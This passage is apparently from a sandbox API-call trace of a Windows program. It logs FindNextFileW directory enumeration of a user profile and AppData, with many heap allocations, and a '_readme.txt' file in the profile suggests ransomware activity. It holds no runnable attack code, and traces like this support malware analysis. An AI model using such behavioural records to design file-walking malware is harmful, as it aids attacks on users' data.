ftLastWriteTime.dwLowDateTime=0x7e82f090, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d965b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d965b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d965b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794831d0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9ac462f0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9ac462f0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0184.598] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5b54690, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0184.599] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned=".txt" [0184.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a43280 | out: hHeap=0x2c0000) returned 1 [0184.599] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5b54690, ftCreationTime.dwHighDateTime=0x1d8a8d3, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0184.599] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0184.600] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.600] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.600] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0184.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0184.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0184.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a90 | out: hHeap=0x2c0000) returned 1 [0184.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7900 | out: hHeap=0x2c0000) returned 1 [0184.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0184.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78b0 | out: hHeap=0x2c0000) returned 1 [0184.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7720 | out: hHeap=0x2c0000) returned 1 [0184.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7658 | out: hHeap=0x2c0000) returned 1 [0184.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76f8 | out: hHeap=0x2c0000) returned 1 [0184.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7748 | out: hHeap=0x2c0000) returned 1 [0184.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b08 | out: hHeap=0x2c0000) returned 1 [0184.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ab8 | out: hHeap=0x2c0000) returned 1 [0184.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0184.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7bd0 | out: hHeap=0x2c0000) returned 1 [0184.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0184.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7bf8 | out: hHeap=0x2c0000) returned 1 [0184.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78d8 | out: hHeap=0x2c0000) returned 1 [0184.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7810 | out: hHeap=0x2c0000) returned 1 [0184.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7860 | out: hHeap=0x2c0000) returned 1 [0184.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79c8 | out: hHeap=0x2c0000) returned 1 [0184.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79f0 | out: hHeap=0x2c0000) returned 1 [0184.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a18 | out: hHeap=0x2c0000) returned 1 [0184.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0184.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfeb8 | out: hHeap=0x2c0000) returned 1 [0184.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfef0 | out: hHeap=0x2c0000) returned 1 [0184.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adff28 | out: hHeap=0x2c0000) returned 1 [0184.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adff60 | out: hHeap=0x2c0000) returned 1 [0184.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0184.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0184.607] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.607] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0184.607] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a18 [0184.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0184.608] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a18 | out: hHeap=0x2c0000) returned 1 [0184.608] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.608] PathFindFileNameW (pszPath="") returned="" [0184.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.608] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.609] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.609] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xa7872780, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xa7872780, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0184.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a403c8 [0184.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a18 [0184.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a403c8 | out: hHeap=0x2c0000) returned 1 [0184.610] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0184.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a403c8 [0184.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x2a05de8 [0184.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40580 [0184.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a18 | out: hHeap=0x2c0000) returned 1 [0184.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a403c8 | out: hHeap=0x2c0000) returned 1 [0184.612] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b49aff0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b49aff0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0184.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a403c8 [0184.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9ed0 [0184.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0184.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0184.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40580 | out: hHeap=0x2c0000) returned 1 [0184.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05de8 | out: hHeap=0x2c0000) returned 1 [0184.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a403c8 | out: hHeap=0x2c0000) returned 1 [0184.614] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b49aff0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b49aff0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0184.614] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0184.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0184.614] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a403c8 [0184.614] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0184.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0184.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 